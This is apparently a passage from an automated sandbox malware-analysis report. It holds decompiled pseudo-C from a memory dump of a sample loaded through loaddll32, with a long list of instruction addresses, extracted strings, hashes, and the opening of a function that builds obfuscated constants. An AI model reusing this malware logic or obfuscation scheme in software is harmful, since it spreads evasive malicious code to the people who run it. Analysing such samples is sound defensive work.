                                                                                                                                                                            										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
                                                                                                                                                                            										goto L13;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										__eflags = _t978 - 0xfd2ad77;
                                                                                                                                                                            										if(_t978 != 0xfd2ad77) {
                                                                                                                                                                            											goto L40;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t978 = 0x352276a;
                                                                                                                                                                            											goto L3;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L43;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}
















































































































                                                                                                                                                                            0x02f667f8
                                                                                                                                                                            0x02f66800
                                                                                                                                                                            0x02f6680a
                                                                                                                                                                            0x02f66811
                                                                                                                                                                            0x02f66818
                                                                                                                                                                            0x02f6681f
                                                                                                                                                                            0x02f66826
                                                                                                                                                                            0x02f6682d
                                                                                                                                                                            0x02f6682e
                                                                                                                                                                            0x02f66835
                                                                                                                                                                            0x02f66836
                                                                                                                                                                            0x02f6683d
                                                                                                                                                                            0x02f66844
                                                                                                                                                                            0x02f6684b
                                                                                                                                                                            0x02f66852
                                                                                                                                                                            0x02f66853
                                                                                                                                                                            0x02f66854
                                                                                                                                                                            0x02f66859
                                                                                                                                                                            0x02f66861
                                                                                                                                                                            0x02f66864
                                                                                                                                                                            0x02f6686e
                                                                                                                                                                            0x02f66878
                                                                                                                                                                            0x02f66880
                                                                                                                                                                            0x02f66882
                                                                                                                                                                            0x02f6688d
                                                                                                                                                                            0x02f66892
                                                                                                                                                                            0x02f6689d
                                                                                                                                                                            0x02f668a8
                                                                                                                                                                            0x02f668b3
                                                                                                                                                                            0x02f668be
                                                                                                                                                                            0x02f668c9
                                                                                                                                                                            0x02f668d4
                                                                                                                                                                            0x02f668df
                                                                                                                                                                            0x02f668ea
                                                                                                                                                                            0x02f668f5
                                                                                                                                                                            0x02f66900
                                                                                                                                                                            0x02f6690b
                                                                                                                                                                            0x02f66916
                                                                                                                                                                            0x02f66921
                                                                                                                                                                            0x02f6692c
                                                                                                                                                                            0x02f66937
                                                                                                                                                                            0x02f6693f
                                                                                                                                                                            0x02f66944
                                                                                                                                                                            0x02f66951
                                                                                                                                                                            0x02f66956
                                                                                                                                                                            0x02f66960
                                                                                                                                                                            0x02f66965
                                                                                                                                                                            0x02f6696b
                                                                                                                                                                            0x02f66973
                                                                                                                                                                            0x02f6697e
                                                                                                                                                                            0x02f66989
                                                                                                                                                                            0x02f66994
                                                                                                                                                                            0x02f6699c
                                                                                                                                                                            0x02f669a8
                                                                                                                                                                            0x02f669ab
                                                                                                                                                                            0x02f669ad
                                                                                                                                                                            0x02f669b1
                                                                                                                                                                            0x02f669b6
                                                                                                                                                                            0x02f669c0
                                                                                                                                                                            0x02f669cc
                                                                                                                                                                            0x02f669d1
                                                                                                                                                                            0x02f669d7
                                                                                                                                                                            0x02f669e4
                                                                                                                                                                            0x02f669e5
                                                                                                                                                                            0x02f669e9
                                                                                                                                                                            0x02f669f1
                                                                                                                                                                            0x02f669fc
                                                                                                                                                                            0x02f66a07
                                                                                                                                                                            0x02f66a12
                                                                                                                                                                            0x02f66a1d
                                                                                                                                                                            0x02f66a28
                                                                                                                                                                            0x02f66a30
                                                                                                                                                                            0x02f66a3b
                                                                                                                                                                            0x02f66a43
                                                                                                                                                                            0x02f66a4b
                                                                                                                                                                            0x02f66a53
                                                                                                                                                                            0x02f66a5b
                                                                                                                                                                            0x02f66a63
                                                                                                                                                                            0x02f66a70
                                                                                                                                                                            0x02f66a74
                                                                                                                                                                            0x02f66a7c
                                                                                                                                                                            0x02f66a84
                                                                                                                                                                            0x02f66a8c
                                                                                                                                                                            0x02f66a99
                                                                                                                                                                            0x02f66a9d
                                                                                                                                                                            0x02f66aa2
                                                                                                                                                                            0x02f66aa7
                                                                                                                                                                            0x02f66aaf
                                                                                                                                                                            0x02f66abc
                                                                                                                                                                            0x02f66ac0
                                                                                                                                                                            0x02f66ac5
                                                                                                                                                                            0x02f66aca
                                                                                                                                                                            0x02f66ad2
                                                                                                                                                                            0x02f66ae6
                                                                                                                                                                            0x02f66aed
                                                                                                                                                                            0x02f66af8
                                                                                                                                                                            0x02f66b03
                                                                                                                                                                            0x02f66b0b
                                                                                                                                                                            0x02f66b13
                                                                                                                                                                            0x02f66b18
                                                                                                                                                                            0x02f66b20
                                                                                                                                                                            0x02f66b28
                                                                                                                                                                            0x02f66b30
                                                                                                                                                                            0x02f66b38
                                                                                                                                                                            0x02f66b42
                                                                                                                                                                            0x02f66b46
                                                                                                                                                                            0x02f66b4e
                                                                                                                                                                            0x02f66b56
                                                                                                                                                                            0x02f66b5b
                                                                                                                                                                            0x02f66b63
                                                                                                                                                                            0x02f66b68
                                                                                                                                                                            0x02f66b70
                                                                                                                                                                            0x02f66b78
                                                                                                                                                                            0x02f66b80
                                                                                                                                                                            0x02f66b88
                                                                                                                                                                            0x02f66b95
                                                                                                                                                                            0x02f66b99
                                                                                                                                                                            0x02f66b9e
                                                                                                                                                                            0x02f66ba6
                                                                                                                                                                            0x02f66bae
                                                                                                                                                                            0x02f66bb6
                                                                                                                                                                            0x02f66bbe
                                                                                                                                                                            0x02f66bcb
                                                                                                                                                                            0x02f66bd4
                                                                                                                                                                            0x02f66bd8
                                                                                                                                                                            0x02f66be0
                                                                                                                                                                            0x02f66bed
                                                                                                                                                                            0x02f66bf3
                                                                                                                                                                            0x02f66bfb
                                                                                                                                                                            0x02f66c03
                                                                                                                                                                            0x02f66c0b
                                                                                                                                                                            0x02f66c13
                                                                                                                                                                            0x02f66c1b
                                                                                                                                                                            0x02f66c2a
                                                                                                                                                                            0x02f66c2d
                                                                                                                                                                            0x02f66c31
                                                                                                                                                                            0x02f66c39
                                                                                                                                                                            0x02f66c41
                                                                                                                                                                            0x02f66c49
                                                                                                                                                                            0x02f66c4e
                                                                                                                                                                            0x02f66c56
                                                                                                                                                                            0x02f66c5e
                                                                                                                                                                            0x02f66c6b
                                                                                                                                                                            0x02f66c6f
                                                                                                                                                                            0x02f66c77
                                                                                                                                                                            0x02f66c7f
                                                                                                                                                                            0x02f66c8b
                                                                                                                                                                            0x02f66c90
                                                                                                                                                                            0x02f66c96
                                                                                                                                                                            0x02f66c9e
                                                                                                                                                                            0x02f66ca6
                                                                                                                                                                            0x02f66cae
                                                                                                                                                                            0x02f66cb6
                                                                                                                                                                            0x02f66cbe
                                                                                                                                                                            0x02f66cc9
                                                                                                                                                                            0x02f66cd1
                                                                                                                                                                            0x02f66cdc
                                                                                                                                                                            0x02f66ce7
                                                                                                                                                                            0x02f66cef
                                                                                                                                                                            0x02f66cf7
                                                                                                                                                                            0x02f66d03
                                                                                                                                                                            0x02f66d08
                                                                                                                                                                            0x02f66d0e
                                                                                                                                                                            0x02f66d16
                                                                                                                                                                            0x02f66d21
                                                                                                                                                                            0x02f66d30
                                                                                                                                                                            0x02f66d35
                                                                                                                                                                            0x02f66d3e
                                                                                                                                                                            0x02f66d49
                                                                                                                                                                            0x02f66d5c
                                                                                                                                                                            0x02f66d5d
                                                                                                                                                                            0x02f66d64
                                                                                                                                                                            0x02f66d6f
                                                                                                                                                                            0x02f66d82
                                                                                                                                                                            0x02f66d89
                                                                                                                                                                            0x02f66d94
                                                                                                                                                                            0x02f66d9f
                                                                                                                                                                            0x02f66daa
                                                                                                                                                                            0x02f66db5
                                                                                                                                                                            0x02f66dc0
                                                                                                                                                                            0x02f66dce
                                                                                                                                                                            0x02f66dd2
                                                                                                                                                                            0x02f66dda
                                                                                                                                                                            0x02f66de2
                                                                                                                                                                            0x02f66dea
                                                                                                                                                                            0x02f66df7
                                                                                                                                                                            0x02f66e02
                                                                                                                                                                            0x02f66e0a
                                                                                                                                                                            0x02f66e15
                                                                                                                                                                            0x02f66e29
                                                                                                                                                                            0x02f66e2e
                                                                                                                                                                            0x02f66e37
                                                                                                                                                                            0x02f66e42
                                                                                                                                                                            0x02f66e4d
                                                                                                                                                                            0x02f66e60
                                                                                                                                                                            0x02f66e63
                                                                                                                                                                            0x02f66e66
                                                                                                                                                                            0x02f66e6d
                                                                                                                                                                            0x02f66e78
                                                                                                                                                                            0x02f66e80
                                                                                                                                                                            0x02f66e88
                                                                                                                                                                            0x02f66e90
                                                                                                                                                                            0x02f66e98
                                                                                                                                                                            0x02f66ea0
                                                                                                                                                                            0x02f66eab
                                                                                                                                                                            0x02f66eb3
                                                                                                                                                                            0x02f66ebe
                                                                                                                                                                            0x02f66ec9
                                                                                                                                                                            0x02f66ed6
                                                                                                                                                                            0x02f66eda
                                                                                                                                                                            0x02f66ee2
                                                                                                                                                                            0x02f66eea
                                                                                                                                                                            0x02f66ef2
                                                                                                                                                                            0x02f66efd
                                                                                                                                                                            0x02f66f08
                                                                                                                                                                            0x02f66f13
                                                                                                                                                                            0x02f66f1e
                                                                                                                                                                            0x02f66f29
                                                                                                                                                                            0x02f66f34
                                                                                                                                                                            0x02f66f3f
                                                                                                                                                                            0x02f66f47
                                                                                                                                                                            0x02f66f52
                                                                                                                                                                            0x02f66f5d
                                                                                                                                                                            0x02f66f68
                                                                                                                                                                            0x02f66f70
                                                                                                                                                                            0x02f66f7b
                                                                                                                                                                            0x02f66f83
                                                                                                                                                                            0x02f66f8d
                                                                                                                                                                            0x02f66f99
                                                                                                                                                                            0x02f66f9d
                                                                                                                                                                            0x02f66fa5
                                                                                                                                                                            0x02f66fb0
                                                                                                                                                                            0x02f66fb8
                                                                                                                                                                            0x02f66fc3
                                                                                                                                                                            0x02f66fce
                                                                                                                                                                            0x02f66fe1
                                                                                                                                                                            0x02f66fe8
                                                                                                                                                                            0x02f66ff3
                                                                                                                                                                            0x02f67005
                                                                                                                                                                            0x02f6700a
                                                                                                                                                                            0x02f6701a
                                                                                                                                                                            0x02f6701d
                                                                                                                                                                            0x02f67024
                                                                                                                                                                            0x02f67031
                                                                                                                                                                            0x02f67039
                                                                                                                                                                            0x02f67041
                                                                                                                                                                            0x02f6704f
                                                                                                                                                                            0x02f67054
                                                                                                                                                                            0x02f67058
                                                                                                                                                                            0x02f67060
                                                                                                                                                                            0x02f6706b
                                                                                                                                                                            0x02f67076
                                                                                                                                                                            0x02f67081
                                                                                                                                                                            0x02f6708c
                                                                                                                                                                            0x02f67097
                                                                                                                                                                            0x02f670a2
                                                                                                                                                                            0x02f670b1
                                                                                                                                                                            0x02f670b2
                                                                                                                                                                            0x02f670b6
                                                                                                                                                                            0x02f670c3
                                                                                                                                                                            0x02f670c7
                                                                                                                                                                            0x02f670cf
                                                                                                                                                                            0x02f670d7
                                                                                                                                                                            0x02f670db
                                                                                                                                                                            0x02f670e0
                                                                                                                                                                            0x02f670e8
                                                                                                                                                                            0x02f670f0
                                                                                                                                                                            0x02f670fb
                                                                                                                                                                            0x02f67103
                                                                                                                                                                            0x02f6710e
                                                                                                                                                                            0x02f67119
                                                                                                                                                                            0x02f67124
                                                                                                                                                                            0x02f6712f
                                                                                                                                                                            0x02f6713a
                                                                                                                                                                            0x02f67145
                                                                                                                                                                            0x02f67150
                                                                                                                                                                            0x02f6715b
                                                                                                                                                                            0x02f67166
                                                                                                                                                                            0x02f67171
                                                                                                                                                                            0x02f67179
                                                                                                                                                                            0x02f67186
                                                                                                                                                                            0x02f6718a
                                                                                                                                                                            0x02f6718f
                                                                                                                                                                            0x02f67197
                                                                                                                                                                            0x02f6719f
                                                                                                                                                                            0x02f671a7
                                                                                                                                                                            0x02f671af
                                                                                                                                                                            0x02f671b7
                                                                                                                                                                            0x02f671bf
                                                                                                                                                                            0x02f671ca
                                                                                                                                                                            0x02f671d5
                                                                                                                                                                            0x02f671e0
                                                                                                                                                                            0x02f671eb
                                                                                                                                                                            0x02f671f3
                                                                                                                                                                            0x02f671fe
                                                                                                                                                                            0x02f67209
                                                                                                                                                                            0x02f6721c
                                                                                                                                                                            0x02f67223
                                                                                                                                                                            0x02f6722e
                                                                                                                                                                            0x02f6723c
                                                                                                                                                                            0x02f67240
                                                                                                                                                                            0x02f67245
                                                                                                                                                                            0x02f6724d
                                                                                                                                                                            0x02f67255
                                                                                                                                                                            0x02f6725d
                                                                                                                                                                            0x02f67262
                                                                                                                                                                            0x02f6726f
                                                                                                                                                                            0x02f67273
                                                                                                                                                                            0x02f6727b
                                                                                                                                                                            0x02f67285
                                                                                                                                                                            0x02f67291
                                                                                                                                                                            0x02f67292
                                                                                                                                                                            0x02f67296
                                                                                                                                                                            0x02f6729e
                                                                                                                                                                            0x02f672a6
                                                                                                                                                                            0x02f672b1
                                                                                                                                                                            0x02f672bc
                                                                                                                                                                            0x02f672c7
                                                                                                                                                                            0x02f672d2
                                                                                                                                                                            0x02f672da
                                                                                                                                                                            0x02f672e5
                                                                                                                                                                            0x02f672f0
                                                                                                                                                                            0x02f672f8
                                                                                                                                                                            0x02f67300
                                                                                                                                                                            0x02f67308
                                                                                                                                                                            0x02f6730d
                                                                                                                                                                            0x02f67315
                                                                                                                                                                            0x02f67329
                                                                                                                                                                            0x02f67330
                                                                                                                                                                            0x02f6733b
                                                                                                                                                                            0x02f67346
                                                                                                                                                                            0x02f6734e
                                                                                                                                                                            0x02f6735b
                                                                                                                                                                            0x02f6735f
                                                                                                                                                                            0x02f67367
                                                                                                                                                                            0x02f6736f
                                                                                                                                                                            0x02f6737a
                                                                                                                                                                            0x02f67382
                                                                                                                                                                            0x02f6738a
                                                                                                                                                                            0x02f67395
                                                                                                                                                                            0x02f673a0
                                                                                                                                                                            0x02f673ab
                                                                                                                                                                            0x02f673b6
                                                                                                                                                                            0x02f673be
                                                                                                                                                                            0x02f673c6
                                                                                                                                                                            0x02f673ce
                                                                                                                                                                            0x02f673d6
                                                                                                                                                                            0x02f673de
                                                                                                                                                                            0x02f673f1
                                                                                                                                                                            0x02f673f8
                                                                                                                                                                            0x02f67400
                                                                                                                                                                            0x02f6740b
                                                                                                                                                                            0x02f6741e
                                                                                                                                                                            0x02f67425
                                                                                                                                                                            0x02f6742d
                                                                                                                                                                            0x02f67438
                                                                                                                                                                            0x02f67443
                                                                                                                                                                            0x02f6744e
                                                                                                                                                                            0x02f67456
                                                                                                                                                                            0x02f67461
                                                                                                                                                                            0x02f67469
                                                                                                                                                                            0x02f67476
                                                                                                                                                                            0x02f6747a
                                                                                                                                                                            0x02f67482
                                                                                                                                                                            0x02f6748a
                                                                                                                                                                            0x02f67495
                                                                                                                                                                            0x02f674a0
                                                                                                                                                                            0x02f674ab
                                                                                                                                                                            0x02f674b3
                                                                                                                                                                            0x02f674b8
                                                                                                                                                                            0x02f674bd
                                                                                                                                                                            0x02f674c5
                                                                                                                                                                            0x02f674cd
                                                                                                                                                                            0x02f674d2
                                                                                                                                                                            0x02f674da
                                                                                                                                                                            0x02f674e5
                                                                                                                                                                            0x02f674f0
                                                                                                                                                                            0x02f674f8
                                                                                                                                                                            0x02f67503
                                                                                                                                                                            0x02f6750a
                                                                                                                                                                            0x02f67511
                                                                                                                                                                            0x02f67511
                                                                                                                                                                            0x02f67511
                                                                                                                                                                            0x02f67516
                                                                                                                                                                            0x02f67516
                                                                                                                                                                            0x02f6751a
                                                                                                                                                                            0x02f6751a
                                                                                                                                                                            0x02f6751a
                                                                                                                                                                            0x02f67520
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f67526
                                                                                                                                                                            0x02f676ab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6752c
                                                                                                                                                                            0x02f67532
                                                                                                                                                                            0x02f67699
                                                                                                                                                                            0x02f6769b
                                                                                                                                                                            0x02f676a2
                                                                                                                                                                            0x02f676a3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f67538
                                                                                                                                                                            0x02f6753e
                                                                                                                                                                            0x02f67651
                                                                                                                                                                            0x02f6765d
                                                                                                                                                                            0x02f67672
                                                                                                                                                                            0x02f67679
                                                                                                                                                                            0x02f6767e
                                                                                                                                                                            0x02f67683
                                                                                                                                                                            0x02f67915
                                                                                                                                                                            0x02f67915
                                                                                                                                                                            0x02f6791c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f67544
                                                                                                                                                                            0x02f6754a
                                                                                                                                                                            0x02f6761e
                                                                                                                                                                            0x02f67623
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f67550
                                                                                                                                                                            0x02f67556
                                                                                                                                                                            0x02f675f0
                                                                                                                                                                            0x02f675f5
                                                                                                                                                                            0x02f675fa
                                                                                                                                                                            0x02f675fc
                                                                                                                                                                            0x02f675fc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6755c
                                                                                                                                                                            0x02f67563
                                                                                                                                                                            0x02f67921
                                                                                                                                                                            0x02f67921
                                                                                                                                                                            0x02f67927
                                                                                                                                                                            0x02f67516
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f67516
                                                                                                                                                                            0x02f67569
                                                                                                                                                                            0x02f675b6
                                                                                                                                                                            0x02f675bb
                                                                                                                                                                            0x02f675c2
                                                                                                                                                                            0x02f675c7
                                                                                                                                                                            0x02f675d0
                                                                                                                                                                            0x02f675d5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f675d5
                                                                                                                                                                            0x02f67563
                                                                                                                                                                            0x02f67556
                                                                                                                                                                            0x02f6754a
                                                                                                                                                                            0x02f6753e
                                                                                                                                                                            0x02f67532
                                                                                                                                                                            0x02f67945
                                                                                                                                                                            0x02f67951
                                                                                                                                                                            0x02f67951
                                                                                                                                                                            0x02f676b5
                                                                                                                                                                            0x02f676b7
                                                                                                                                                                            0x02f67772
                                                                                                                                                                            0x02f67775
                                                                                                                                                                            0x02f677a6
                                                                                                                                                                            0x02f67777
                                                                                                                                                                            0x02f67777
                                                                                                                                                                            0x02f67783
                                                                                                                                                                            0x02f6778a
                                                                                                                                                                            0x02f67795
                                                                                                                                                                            0x02f6779a
                                                                                                                                                                            0x02f6779d
                                                                                                                                                                            0x02f6779d
                                                                                                                                                                            0x02f677e6
                                                                                                                                                                            0x02f677ed
                                                                                                                                                                            0x02f677ed
                                                                                                                                                                            0x02f677ef
                                                                                                                                                                            0x02f677f1
                                                                                                                                                                            0x02f677f1
                                                                                                                                                                            0x02f67841
                                                                                                                                                                            0x02f67858
                                                                                                                                                                            0x02f6785d
                                                                                                                                                                            0x02f67860
                                                                                                                                                                            0x02f67862
                                                                                                                                                                            0x02f67910
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f67868
                                                                                                                                                                            0x02f6788b
                                                                                                                                                                            0x02f67892
                                                                                                                                                                            0x02f67897
                                                                                                                                                                            0x02f6789a
                                                                                                                                                                            0x02f6789c
                                                                                                                                                                            0x02f678c6
                                                                                                                                                                            0x02f678d6
                                                                                                                                                                            0x02f678d6
                                                                                                                                                                            0x02f678d6
                                                                                                                                                                            0x02f678fe
                                                                                                                                                                            0x02f67903
                                                                                                                                                                            0x02f67903
                                                                                                                                                                            0x02f67906
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f67906
                                                                                                                                                                            0x02f676bd
                                                                                                                                                                            0x02f676bd
                                                                                                                                                                            0x02f676c3
                                                                                                                                                                            0x02f67763
                                                                                                                                                                            0x02f6776a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f676c9
                                                                                                                                                                            0x02f676c9
                                                                                                                                                                            0x02f676cf
                                                                                                                                                                            0x02f6793e
                                                                                                                                                                            0x02f676d5
                                                                                                                                                                            0x02f676d5
                                                                                                                                                                            0x02f676db
                                                                                                                                                                            0x02f676f3
                                                                                                                                                                            0x02f676f5
                                                                                                                                                                            0x02f676f7
                                                                                                                                                                            0x02f67705
                                                                                                                                                                            0x02f67705
                                                                                                                                                                            0x02f676f9
                                                                                                                                                                            0x02f67700
                                                                                                                                                                            0x02f67700
                                                                                                                                                                            0x02f67707
                                                                                                                                                                            0x02f6772c
                                                                                                                                                                            0x02f67731
                                                                                                                                                                            0x02f67736
                                                                                                                                                                            0x02f6773e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f676dd
                                                                                                                                                                            0x02f676dd
                                                                                                                                                                            0x02f676e3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f676e9
                                                                                                                                                                            0x02f676e9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f676e9
                                                                                                                                                                            0x02f676e3
                                                                                                                                                                            0x02f676db
                                                                                                                                                                            0x02f676cf
                                                                                                                                                                            0x02f676c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f676b7
                                                                                                                                                                            0x02f67516

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
                                                                                                                                                                            • API String ID: 0-4090907037
                                                                                                                                                                            • Opcode ID: 2af53db771e3cf25d14d9997d8737b3e6133c1bd41054273b8fb9b83f676e812
                                                                                                                                                                            • Instruction ID: 7cdff3f1b71b470f7b0f9c44b8947c3c266e9f9a7f3ee9e540a7b71d442386d5
                                                                                                                                                                            • Opcode Fuzzy Hash: 2af53db771e3cf25d14d9997d8737b3e6133c1bd41054273b8fb9b83f676e812
                                                                                                                                                                            • Instruction Fuzzy Hash: 10920DB2509381CFD3B9CF25C54AA9BBBE1FBC4348F00891DE6D996260D7B58949CF42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F6A474(void* __ecx) {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				char _v1560;
                                                                                                                                                                            				char _v2080;
                                                                                                                                                                            				char _v2600;
                                                                                                                                                                            				signed int _v2604;
                                                                                                                                                                            				signed int _v2608;
                                                                                                                                                                            				signed int _v2612;
                                                                                                                                                                            				signed int _v2616;
                                                                                                                                                                            				signed int _v2620;
                                                                                                                                                                            				signed int _v2624;
                                                                                                                                                                            				signed int _v2628;
                                                                                                                                                                            				signed int _v2632;
                                                                                                                                                                            				signed int _v2636;
                                                                                                                                                                            				signed int _v2640;
                                                                                                                                                                            				signed int _v2644;
                                                                                                                                                                            				signed int _v2648;
                                                                                                                                                                            				signed int _v2652;
                                                                                                                                                                            				signed int _v2656;
                                                                                                                                                                            				signed int _v2660;
                                                                                                                                                                            				signed int _v2664;
                                                                                                                                                                            				signed int _v2668;
                                                                                                                                                                            				signed int _v2672;
                                                                                                                                                                            				signed int _v2676;
                                                                                                                                                                            				signed int _v2680;
                                                                                                                                                                            				signed int _v2684;
                                                                                                                                                                            				signed int _v2688;
                                                                                                                                                                            				signed int _v2692;
                                                                                                                                                                            				signed int _v2696;
                                                                                                                                                                            				signed int _v2700;
                                                                                                                                                                            				signed int _v2704;
                                                                                                                                                                            				signed int _v2708;
                                                                                                                                                                            				signed int _v2712;
                                                                                                                                                                            				signed int _v2716;
                                                                                                                                                                            				signed int _v2720;
                                                                                                                                                                            				signed int _v2724;
                                                                                                                                                                            				signed int _v2728;
                                                                                                                                                                            				signed int _v2732;
                                                                                                                                                                            				signed int _v2736;
                                                                                                                                                                            				signed int _v2740;
                                                                                                                                                                            				signed int _v2744;
                                                                                                                                                                            				signed int _v2748;
                                                                                                                                                                            				signed int _v2752;
                                                                                                                                                                            				signed int _v2756;
                                                                                                                                                                            				signed int _v2760;
                                                                                                                                                                            				signed int _v2764;
                                                                                                                                                                            				signed int _v2768;
                                                                                                                                                                            				signed int _v2772;
                                                                                                                                                                            				signed int _v2776;
                                                                                                                                                                            				signed int _v2780;
                                                                                                                                                                            				signed int _v2784;
                                                                                                                                                                            				signed int _v2788;
                                                                                                                                                                            				signed int _v2792;
                                                                                                                                                                            				signed int _t422;
                                                                                                                                                                            				signed int _t444;
                                                                                                                                                                            				signed int _t445;
                                                                                                                                                                            				signed int _t446;
                                                                                                                                                                            				signed int _t447;
                                                                                                                                                                            				signed int _t448;
                                                                                                                                                                            				signed int _t449;
                                                                                                                                                                            				void* _t487;
                                                                                                                                                                            				void* _t488;
                                                                                                                                                                            				signed int* _t492;
                                                                                                                                                                            
                                                                                                                                                                            				_t492 =  &_v2792;
                                                                                                                                                                            				_t487 = __ecx;
                                                                                                                                                                            				_v2736 = 0xa43fec;
                                                                                                                                                                            				_v2736 = _v2736 + 0xffff66c9;
                                                                                                                                                                            				_v2736 = _v2736 >> 0xc;
                                                                                                                                                                            				_v2736 = _v2736 ^ 0x00000a13;
                                                                                                                                                                            				_v2788 = 0xca245c;
                                                                                                                                                                            				_v2788 = _v2788 + 0xc295;
                                                                                                                                                                            				_v2788 = _v2788 << 6;
                                                                                                                                                                            				_v2788 = _v2788 + 0xffff0e49;
                                                                                                                                                                            				_v2788 = _v2788 ^ 0x32b58b6e;
                                                                                                                                                                            				_v2660 = 0x35f9ef;
                                                                                                                                                                            				_v2660 = _v2660 << 0xe;
                                                                                                                                                                            				_v2660 = _v2660 ^ 0x7e7543bd;
                                                                                                                                                                            				_v2688 = 0x437073;
                                                                                                                                                                            				_v2688 = _v2688 >> 0xe;
                                                                                                                                                                            				_v2688 = _v2688 ^ 0xf2a4f008;
                                                                                                                                                                            				_v2688 = _v2688 ^ 0xf2aac2be;
                                                                                                                                                                            				_v2700 = 0x2c6eea;
                                                                                                                                                                            				_v2700 = _v2700 >> 1;
                                                                                                                                                                            				_v2700 = _v2700 | 0x2b7eca56;
                                                                                                                                                                            				_v2700 = _v2700 ^ 0x2b78a774;
                                                                                                                                                                            				_v2676 = 0xafd7a5;
                                                                                                                                                                            				_v2676 = _v2676 >> 0xb;
                                                                                                                                                                            				_v2676 = _v2676 ^ 0x0002223f;
                                                                                                                                                                            				_v2740 = 0x8278b2;
                                                                                                                                                                            				_v2740 = _v2740 << 6;
                                                                                                                                                                            				_v2740 = _v2740 << 1;
                                                                                                                                                                            				_v2740 = _v2740 ^ 0x4136a23a;
                                                                                                                                                                            				_v2612 = 0x7f4f91;
                                                                                                                                                                            				_v2612 = _v2612 + 0xffff9116;
                                                                                                                                                                            				_v2612 = _v2612 ^ 0x007102c2;
                                                                                                                                                                            				_v2668 = 0x4461fd;
                                                                                                                                                                            				_v2668 = _v2668 * 0x27;
                                                                                                                                                                            				_v2668 = _v2668 ^ 0x0a629f7c;
                                                                                                                                                                            				_t488 = 0x219adc7;
                                                                                                                                                                            				_v2756 = 0xa77258;
                                                                                                                                                                            				_v2756 = _v2756 >> 2;
                                                                                                                                                                            				_v2756 = _v2756 + 0x9d81;
                                                                                                                                                                            				_t444 = 0x54;
                                                                                                                                                                            				_v2756 = _v2756 * 0x70;
                                                                                                                                                                            				_v2756 = _v2756 ^ 0x12998c8c;
                                                                                                                                                                            				_v2628 = 0x3fd810;
                                                                                                                                                                            				_v2628 = _v2628 + 0xfffff92f;
                                                                                                                                                                            				_v2628 = _v2628 ^ 0x003ee59a;
                                                                                                                                                                            				_v2780 = 0x9fe7be;
                                                                                                                                                                            				_v2780 = _v2780 + 0xaec4;
                                                                                                                                                                            				_v2780 = _v2780 << 0x10;
                                                                                                                                                                            				_v2780 = _v2780 >> 2;
                                                                                                                                                                            				_v2780 = _v2780 ^ 0x25a64a78;
                                                                                                                                                                            				_v2620 = 0xbf1dbc;
                                                                                                                                                                            				_v2620 = _v2620 + 0xffff98cb;
                                                                                                                                                                            				_v2620 = _v2620 ^ 0x00bd158d;
                                                                                                                                                                            				_v2732 = 0xa8760d;
                                                                                                                                                                            				_v2732 = _v2732 << 8;
                                                                                                                                                                            				_v2732 = _v2732 + 0xa9d7;
                                                                                                                                                                            				_v2732 = _v2732 ^ 0xa87dd804;
                                                                                                                                                                            				_v2684 = 0xb5ab85;
                                                                                                                                                                            				_v2684 = _v2684 / _t444;
                                                                                                                                                                            				_v2684 = _v2684 ^ 0x0004fa7b;
                                                                                                                                                                            				_v2708 = 0x9eabf6;
                                                                                                                                                                            				_t445 = 0x4f;
                                                                                                                                                                            				_v2708 = _v2708 / _t445;
                                                                                                                                                                            				_v2708 = _v2708 ^ 0xed59372e;
                                                                                                                                                                            				_v2708 = _v2708 ^ 0xed517486;
                                                                                                                                                                            				_v2608 = 0x5ae525;
                                                                                                                                                                            				_v2608 = _v2608 * 0x4c;
                                                                                                                                                                            				_v2608 = _v2608 ^ 0x1afb43af;
                                                                                                                                                                            				_v2644 = 0xaf8ee5;
                                                                                                                                                                            				_v2644 = _v2644 ^ 0xf4d3cb8d;
                                                                                                                                                                            				_v2644 = _v2644 ^ 0xf47b6f68;
                                                                                                                                                                            				_v2604 = 0xc38975;
                                                                                                                                                                            				_v2604 = _v2604 >> 0xf;
                                                                                                                                                                            				_v2604 = _v2604 ^ 0x000b5702;
                                                                                                                                                                            				_v2652 = 0x27ffed;
                                                                                                                                                                            				_v2652 = _v2652 + 0x9a12;
                                                                                                                                                                            				_v2652 = _v2652 ^ 0x002af41d;
                                                                                                                                                                            				_v2616 = 0x7935fe;
                                                                                                                                                                            				_v2616 = _v2616 + 0x1306;
